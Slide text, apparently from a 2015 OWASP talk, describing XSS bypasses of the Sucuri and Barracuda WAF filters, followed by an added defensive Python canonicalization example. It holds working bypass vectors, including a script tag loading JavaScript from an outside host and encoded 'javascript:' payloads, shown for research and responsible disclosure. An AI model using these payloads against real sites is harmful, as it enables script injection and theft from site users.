A Talk by Ashar Javed
@
IX OWASP Spain Chapter Meeting
12th June 2015, Barcelona (Spain)
Credits: @2sharmavishal for giving me the idea of making a comparison between Sucuri and Pizza
Credits: @Paul_Reviews
for the heads-up, for providing me a URL for further testing, rewarding my findings, and quickly fixing all XSS bypasses ...
%26 instead of &
Works in old IE browsers, e.g., IE7; the vector makes use of CSS escaping:
\0a == line feed
\0b == vertical tab
\0c == form feed
I used a closing angle bracket as the value of a class attribute; the purpose is to fool the parser ...
Use of backticks `` instead of parentheses () for the function call. ES6 provides this.
At that time, Sucuri tried to block keywords like alert, prompt and confirm. I used InputBox as a PoC.
I used the source property of a RegExp object. It returns the pattern string without the slashes. The purpose is to defeat the black-listed keyword confirm.
Credits: @kinugawamasato
Related Writeup Here
<script%2fsrc='http://xssplaygroundforfunandlearn.netai.net/scr2.js'> < </script>
Decimal encoding of the character "t" == t,
while & == %26 and # == %23
Hex encoding of the character "t", and then URL-encode the & and # signs
Hex encoding of : (IE-specific), and then URL-encode & and #
Note: They have since made some changes in the implementation
while name == javascript:alert(1)
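To show why the decimal/hex character references and URL-encoded & and # above slip past a filter that only looks at the raw bytes, here is an added example (not from the talk, and not Sucuri's or Barracuda's code) of the canonicalization step a defender puts in front of keyword matching; the keyword list and the sample inputs are constructed for illustration.

```python
import html
from urllib.parse import unquote

# Keyword blacklist of the kind the talk describes. Constructed for this
# example; it is not any vendor's actual rule set.
BLOCKED = ("javascript:", "alert", "prompt", "confirm")


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Undo URL-encoding and HTML character references (decimal &#116;,
    hex &#x74;, named) repeatedly until the string stops changing, so that
    nested layers such as %26%23116%3b collapse to the character they hide."""
    current = value
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current.lower()


def naive_contains_blocked(value: str) -> bool:
    """Keyword match on the raw input: the behaviour the bypasses exploit."""
    return any(keyword in value.lower() for keyword in BLOCKED)


def canonical_contains_blocked(value: str) -> bool:
    """Same keyword list, applied after canonicalization."""
    return any(keyword in canonicalize(value) for keyword in BLOCKED)


if __name__ == "__main__":
    # Constructed samples: the middle three hide the "t" of "javascript:"
    # behind one or two encoding layers, the last one is benign.
    samples = [
        "javascript:window.name",
        "javascrip&#116;:window.name",
        "javascrip%26%23x74%3b:window.name",
        "javascrip%2526%2523116%253b:window.name",
        "https://example.com/?q=1%26r=2",
    ]
    for s in samples:
        print(f"{s!r:45} raw={naive_contains_blocked(s)!s:5} "
              f"canonical={canonical_contains_blocked(s)}")
```

Canonicalization only narrows the gap; a keyword blacklist stays a cat-and-mouse game, and the durable fix is context-aware output encoding at the point where untrusted data is written into HTML, attributes, URLs or script.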
Note: Remember that we were facing a limitation of 7 characters ...
Note: I think SQLi is also there ... anyone can play a cat-and-mouse game specific to SQLi :D
A never-ending game ... ?
Note: The bypasses will be made available once Barracuda has fixed them.
HTMLSecSweeper is a research tool that finds XSS in an automated manner in three common contexts.